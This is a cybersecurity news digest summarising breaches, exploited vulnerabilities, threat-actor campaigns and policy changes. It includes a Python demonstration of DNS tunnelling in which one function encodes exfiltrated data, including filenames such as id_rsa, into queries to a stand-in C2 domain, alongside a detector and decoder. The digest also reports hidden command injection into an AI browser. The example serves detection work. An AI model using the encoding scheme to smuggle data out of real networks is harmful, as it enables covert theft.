Major Incidents or Breaches

  • A database containing information on individuals with ‘Top Secret’ clearance who applied for jobs with US House Democrats was left openly accessible online.
  • Toys “R” Us Canada suffered a data breach.

Newly Discovered Vulnerabilities

  • A new vulnerability in OpenAI’s ChatGPT Atlas web browser allows attackers to inject persistent, hidden commands into the AI platform.
  • QNAP warned customers of a critical ASP.NET Core vulnerability affecting its NetBak PC Agent Windows backup utility, urging immediate patching.
  • A zero-day vulnerability in Google Chrome, exploited in Operation ForumTroll, was used to deliver spyware linked to Italian vendor Memento Labs (formerly IntheCyber Group/Hacking Team).
  • Mass exploitation of year-old critical WordPress plugin vulnerabilities has resumed, with roughly 9 million exploit attempts observed this month.
  • The US Cybersecurity and Infrastructure Security Agency (CISA) ordered federal agencies to patch a critical Windows Server Update Services (WSUS) vulnerability actively exploited in attacks.

Notable Threat Actor Activity

  • The BlueNoroff APT, linked to North Korea, was observed running the GhostCall and GhostHire campaigns against the cryptocurrency sector, using multi-stage macOS malware chains and stealer suites, with fake job and funding offers as lures.
  • The SideWinder group launched a new campaign targeting South Asian diplomats and a European embassy in New Delhi, using a ClickOnce-based attack chain.
  • Qilin ransomware (aka Agenda, Gold Feather, Water Galura) continues to pair its Linux payloads with BYOVD (Bring Your Own Vulnerable Driver) techniques in hybrid attacks against both Linux and Windows hosts, with over 40 victims per month in 2025 (excluding January).
  • A large-scale China-linked smishing campaign used 194,000 domains to harvest sensitive information, including Social Security numbers.
  • A Morocco-based group is conducting a significant gift card fraud campaign (“Jingle Thief”), targeting retailers.
  • Threat actors continue to mass-exploit old WordPress plugin vulnerabilities to compromise websites at scale.
  • Phishing campaigns are targeting LastPass users with fake death notices that use the service's digital-will feature as a pretext to capture master passwords.

Trends, Tools, or Tactics of Interest

  • Ransomware profits have declined: only 23% of breached organisations paid a ransom, which is attributed to large enterprises increasingly refusing to pay and to lower payments from mid-market firms.
  • Attackers are using AI to weaponise old vulnerabilities faster, while defenders face expanding attack surfaces and limited resources.
  • Malware continues to use DNS tunneling (e.g., Base64-encoded data carried in DNS query names) for command-and-control traffic, since outbound DNS is rarely blocked at the egress.
  • Chatbots, including ChatGPT, Gemini, DeepSeek, and Grok, are serving users Russian state-backed propaganda in response to queries about the Ukraine invasion.
  • The Qilin ransomware group evades Windows-centric defences by running its Linux-based ransomware on Windows hosts, a cross-platform tactic.
  • Smishing and phishing campaigns are increasingly sophisticated, leveraging large domain infrastructures and social engineering lures (e.g., fake job offers, death notices).
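
The Base64-over-DNS technique noted above, shown end to end as an added example that is not code from any report or vendor cited in this digest: a constructed beacon packs Base64url chunks into query-name labels, a detector scores resolver log lines per (client, domain) pair by query count, total label bytes, Base64url charset and Shannon entropy, and an analyst-side routine reassembles the flagged stream. The log format, the thresholds, the payload and the domain c2-relay.example are assumptions; real deployments should use the public suffix list for registered-domain extraction rather than the last-two-labels shortcut used here.

```python
"""Detect Base64-over-DNS tunnelling in DNS query logs (constructed example)."""
import base64
import math
from collections import defaultdict

# Base64url alphabet: '-' and '_' are legal in DNS labels, '+' and '/' are not,
# so tunnels that put Base64 into query names normally use this variant.
BASE64URL_ALPHABET = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
)

# Constructed payload standing in for data a beacon would exfiltrate.
SAMPLE_PAYLOAD = (
    b"host=WS-042;user=j.doe;task=ls /home/j.doe/Documents;"
    b"out=budget.xlsx,passport.pdf,vpn-config.ovpn,id_rsa,notes.txt"
)
C2_DOMAIN = "c2-relay.example"  # assumed attacker-controlled zone


def encode_tunnel_queries(payload: bytes, domain: str, chunk: int = 48) -> list[str]:
    """Attacker side: Base64url-encode the payload, drop the padding, and send
    one chunk per query as <seq>.<chunk>.<domain> (labels must stay <= 63 bytes)."""
    b64 = base64.urlsafe_b64encode(payload).decode().rstrip("=")
    return [
        f"{i}.{b64[j:j + chunk]}.{domain}"
        for i, j in enumerate(range(0, len(b64), chunk))
    ]


def build_sample_log() -> list[str]:
    """Constructed resolver log, one query per line: '<epoch> <client> <qtype> <qname>'."""
    benign = ["www.example.com", "mail.example.com", "www.example.com", "cdn.example.org"]
    lines = [f"{1730000000 + i} 10.0.0.5 A {q}" for i, q in enumerate(benign)]
    tunnel = encode_tunnel_queries(SAMPLE_PAYLOAD, C2_DOMAIN)
    lines += [f"{1730000100 + i} 10.0.0.7 TXT {q}" for i, q in enumerate(tunnel)]
    return lines


def shannon_entropy(s: str) -> float:
    """Bits per character: Base64 data sits near 5-6, ordinary hostnames near 1-3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> tuple[str, str]:
    """Return (leading labels joined, registered domain).
    Simplification: registered domain = last two labels. Case is kept on
    purpose: Base64 is case-sensitive, which is also why 0x20 case
    randomisation by resolvers breaks such tunnels and pushes real tooling
    towards Base32 or hex encodings."""
    labels = qname.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return "".join(labels[:-2]), ".".join(labels[-2:])


def detect_tunnelling(log_lines, min_queries=3, min_total_len=60, min_entropy=3.5):
    """Flag (client, domain) pairs whose concatenated leading labels look like a
    Base64 stream: enough queries, enough bytes, Base64url charset only and high
    entropy. Tune thresholds per environment and allow-list legitimate
    high-entropy senders (CDNs, anti-virus cloud lookups, DKIM, DNSSEC-heavy zones)."""
    per_pair = defaultdict(list)
    for line in log_lines:
        _ts, client, _qtype, qname = line.split()
        host, domain = split_name(qname)
        per_pair[(client, domain)].append(host)
    flagged = []
    for (client, domain), hosts in per_pair.items():
        blob = "".join(hosts)
        if (
            len(hosts) >= min_queries
            and len(blob) >= min_total_len
            and set(blob) <= BASE64URL_ALPHABET
            and shannon_entropy(blob) >= min_entropy
        ):
            flagged.append((client, domain))
    return flagged


def decode_tunnel(log_lines, domain: str) -> bytes:
    """Analyst side: reassemble the chunks for one flagged domain in sequence
    order and restore the padding the sender stripped."""
    chunks = {}
    for line in log_lines:
        labels = line.split()[3].rstrip(".").split(".")
        if len(labels) == 4 and ".".join(labels[-2:]) == domain:
            chunks[int(labels[0])] = labels[1]
    b64 = "".join(chunks[i] for i in sorted(chunks))
    return base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))


if __name__ == "__main__":
    log = build_sample_log()
    for client, domain in detect_tunnelling(log):
        print(f"suspect tunnel: {client} -> {domain}")
        print("recovered:", decode_tunnel(log, domain).decode())
```

The per-pair aggregation matters more than any single-query score: one high-entropy label is common (DKIM selectors, CDN hashes), while a client that sends dozens of distinct, long, Base64-only labels to the same zone is the signature of a tunnel. The charset test is a cheap way to separate Base64url carriers from the Base32 or hex variants, which need their own alphabet sets.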

Regulatory or Policy Developments Affecting the Security Industry

  • X (formerly Twitter) is requiring users to re-enrol their two-factor authentication (2FA) security keys or passkeys by 10 November to avoid account lockout.
  • Mozilla now requires all new Firefox extensions to declare data collection practices in their manifest files.
  • Microsoft has introduced a policy enabling IT administrators to remove pre-installed Microsoft Store apps from Windows systems.
  • Microsoft is testing a feature in Windows 11 that prompts users to run a memory scan following a blue screen of death (BSOD) crash.
  • CISA has mandated patching of the actively exploited WSUS vulnerability across US federal agencies.